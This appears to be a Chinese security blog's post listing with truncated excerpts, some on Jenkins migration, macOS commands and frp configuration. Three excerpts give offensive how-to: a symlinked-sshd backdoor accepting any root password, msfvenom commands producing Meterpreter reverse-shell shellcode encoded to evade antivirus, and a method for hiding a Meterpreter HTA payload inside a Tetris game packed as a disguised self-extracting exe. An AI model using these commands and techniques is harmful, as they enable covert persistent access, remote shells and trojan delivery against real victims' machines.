通过软连接建立一个ssh后门: ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345 说明:建立软连接到/usr/local/su 文件,也可以在其他目录,su文件名字不能变,变了就无法登录。当然可以通过其他设置,更改su名字也是可以的。然后启动,并指定监听12345端口,登录的时候密码随意即可,登录如下: ssh [email protected] -p 12345 注意:这个如果目标在执行软连接的时候,如果使用了其他账号创建,则登录的时候需要使用对应的账号,而非root 上面提到要更改软连接su名字,需要用以下命令,xxxxxx为你需要更改的名字: echo ” #%PAM-1.0 auth sufficient pam_rootok.so auth & […]
shellcode貌似又不免杀了,继续更新….(20190525)
之前说过使用msf生成shellcode 使用特殊编码十五六次就可以过静态查杀了,奈何Anti Virus(反病毒软件), 简称AV。不可能一直允许的啊…. 不废话了,直接还是shellcode生成,继续过AV。 msfvenom -p windows/meterpreter/reverse_https lhost=xxx.xxx.xxx.xxx lport=8888 -e x86/shikata_ga_nai -i 15 –smallest -b ‘\x00’ -f c > 1 把1里的shellcode编译成exe即可,至于为什么能过AV,可能是使用了http协议,对于日一台web服务器,AV们也不敢管,也不敢细问啊….
centos下jenkins服务器迁移笔记
一、备份即将迁移的服务器jenkins所有配置和文件 1.rpm -qa|grep jenkins //查看已安装的jenkins信息 2.rpm -ql jenkins-2.164.3-1.1.noarch //查看所有jenkins的相关 然后分别将这些文件copy到一个bak目录(注意,当前根目录下的.jenkins(即~/.jenkins 也需要打包),并压缩bak文件夹copy到新的服务器 二、新服务器安装必要依赖软件并启用jenkins 1.查看服务器时间是否正确,如果正确可忽略这一步: date //查看当前时间,如果和当前区域时间不准,请进行下列操作 yum install -y ntpdate ntpdate time.windows.com 2.yum -y groupinstall “Development tools” //安装开发库工具包 3.yum instal […]
俄罗斯方块加入反弹后门方法(免杀)
注:免责申明,该方法只是用来娱乐,切勿做任何违法行为。一、主要步骤:1.制作一个hta(http application)游戏,文中用的是俄罗斯方块2.用msf生成一个hta-psh 嵌入到hta游戏里面3.用rar压缩文件把hta压缩成一个自动解压的exe文件,并自定义一个程序图标(安全,过杀软)最终效果如下: 开始: 1.制作一个hta游戏,俄罗斯方块,hta代码如下:(也可以找其他游戏替代) 将下列代码保存为后缀为hta文件,打开看看能不能运行,然后继续…. 2.用msf生成一个hta-psh 嵌入到hta游戏里面 使用msfconsole -n进入msf(最新版msf需要进入后才能使用msfvenom命令) msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=2333 -f ht […]
MacOS 不常用的各种命令
一.界面相关的设置: 1.#osascript 桌面消息通知,有些时候写脚本定时出发桌面的消息通知用osascript -e ‘display notification “Come on Come on turn the radio on” with title “您有信息消息啦” subtitle “Hello,Jove”‘#效果这样子如下: 2.#设置计算机名称(也可以通过系统偏好设置→共享)sudo scutil –set ComputerName “0x6D746873″sudo scutil –set HostName “0x6D746873″sudo scutil –set LocalHostName “0x6D746873″sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.smb […]
IOS开发笔记-json数据格式及其他
1.读取列表后展现[“1-aaaa.com”, “2-bbbb.com”, “3-cccc.com”, “4-dddd.com”] 2.如果要使用swift处理json数据,那么json数据格式需要如下: //多了方括号[][{“aaaa”:”1111″,”bbbb”:”2222″,”cccc”:”3333″,”dddd”:”4444″}]
frps和frpc配置模版
frps.ini 服务端配置文件模版:[common] //公共部分标识 bind_port = 10086 //与frpc客户端通讯端口 privilege_token = 123456aa //与frpc通讯时的认证密码,frpc.ini 配时要一致 max_pool_count = 50 //最大连接池50 dashboard_port = 65536 //web页面流量查看和连接状态查看端口 dashboard_user = 123456aa //web页面的登录账号 dashboard_pwd = 123456aa //web页面的登录密码 use_encryption = true //通讯启用加密 use_compression = true //通讯启用压缩 frpc.ini 客户端配置文件模版: [common] //公共部分标识 server_addr = xxx.xx […]